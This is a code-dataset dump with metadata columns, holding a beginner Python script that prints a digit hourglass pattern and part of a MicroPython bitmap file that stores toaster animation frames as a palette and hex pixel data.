| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5c904a7cb408fc9e2a3bf542b61ce34257fcaa2b
| 293
|
py
|
Python
|
Chapter-3 Loop/Triangle_Pattern/Damru.py
|
jaiswalIT02/pythonprograms
|
bc94e52121202b04c3e9112d9786f93ed6707f7a
|
[
"MIT"
] | null | null | null |
Chapter-3 Loop/Triangle_Pattern/Damru.py
|
jaiswalIT02/pythonprograms
|
bc94e52121202b04c3e9112d9786f93ed6707f7a
|
[
"MIT"
] | null | null | null |
Chapter-3 Loop/Triangle_Pattern/Damru.py
|
jaiswalIT02/pythonprograms
|
bc94e52121202b04c3e9112d9786f93ed6707f7a
|
[
"MIT"
] | null | null | null |
def damru(n=5):
    """Print a "damru" (hourglass) digit pattern with n levels per half.

    Each row for level i consists of (n - i) leading spaces followed by
    the digit i repeated (2*i - 1) times. Levels run n down to 1, then
    back up from 2 to n, so the full pattern has 2*n - 1 rows.

    Args:
        n: Number of levels in each half of the pattern. Defaults to 5,
           the value hard-coded in the original script.
    """
    # Top half: widest row first, shrinking to a single centered digit.
    for i in range(n, 0, -1):
        print(" " * (n - i) + str(i) * (2 * i - 1))
    # Bottom half: mirror of the top, skipping the middle row.
    for i in range(2, n + 1):
        print(" " * (n - i) + str(i) * (2 * i - 1))


# Preserve the original script's behavior: print the default pattern on run.
damru()
| 18.3125
| 28
| 0.450512
| 58
| 293
| 2.275862
| 0.224138
| 0.318182
| 0.242424
| 0.166667
| 0.787879
| 0.787879
| 0.787879
| 0.787879
| 0.787879
| 0.787879
| 0
| 0.065657
| 0.324232
| 293
| 15
| 29
| 19.533333
| 0.60101
| 0
| 0
| 0.769231
| 0
| 0
| 0.006826
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.461538
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
5ca247e846137392c755c84ef767ddbe0c7feaf3
| 44,391
|
py
|
Python
|
examples/esp32_320x240/toasters/toast_bitmaps.py
|
slabua/st7789py_mpy
|
31e6f94592563e2b5ad716c48486e605ca3911bb
|
[
"MIT"
] | null | null | null |
examples/esp32_320x240/toasters/toast_bitmaps.py
|
slabua/st7789py_mpy
|
31e6f94592563e2b5ad716c48486e605ca3911bb
|
[
"MIT"
] | null | null | null |
examples/esp32_320x240/toasters/toast_bitmaps.py
|
slabua/st7789py_mpy
|
31e6f94592563e2b5ad716c48486e605ca3911bb
|
[
"MIT"
] | null | null | null |
# Sprite-sheet geometry for the toaster animation frames.
BITMAPS = 5   # number of frames packed into the bitmap data
HEIGHT = 64   # frame height in pixels
WIDTH = 64    # frame width in pixels
COLORS = 16   # number of palette entries
BITS = 81920  # total bitmap size in bits (= BITMAPS * HEIGHT * WIDTH * BPP)
BPP = 4       # bits per pixel (16-color indexed)

# 16-entry color lookup table, one 16-bit color word per 4-bit pixel index.
# NOTE(review): values appear to be byte-swapped RGB565 for the ST7789 —
# confirm against the display driver before relying on channel order.
PALETTE = [
    0x0000, 0x00f8, 0x4082, 0xe0ff,
    0x609b, 0x4049, 0xff07, 0xffff,
    0xdbde, 0xb6b5, 0x9294, 0x6d6b,
    0x494a, 0x2421, 0x00d8, 0x00b0,
]
_bitmap =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x77\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x77\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x77\x77\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x00\x00\x77\x77\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x00\x77\x77\x77\x00\x00\x77\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x00\x77\x77\x77\x00\x00\x77\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x77\x77\x77\x77\x77\x00\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x77\x77\x77\x77\x77\x00\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x77\x77\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x77\x77\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\x77\x77\x77\x77\x77\x00\xbb\x22\x22\x00\x00\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\x77\x77\x77\x77\x77\x00\xbb\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x00\x00\x00\x00\xbb\xbb\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x00\x00\x00\x00\xbb\xbb\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x77\x77\x77\x00\xbb\xbb\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x77\x77\x77\x00\xbb\xbb\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\xbb\xbb\xbb\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\xbb\xbb\xbb\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\x99\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\x99\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x00\x77\x77\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x00\x77\x77\x77\x77\x77\x00\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x00\x77\x77\x77\x77\x77\x00\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
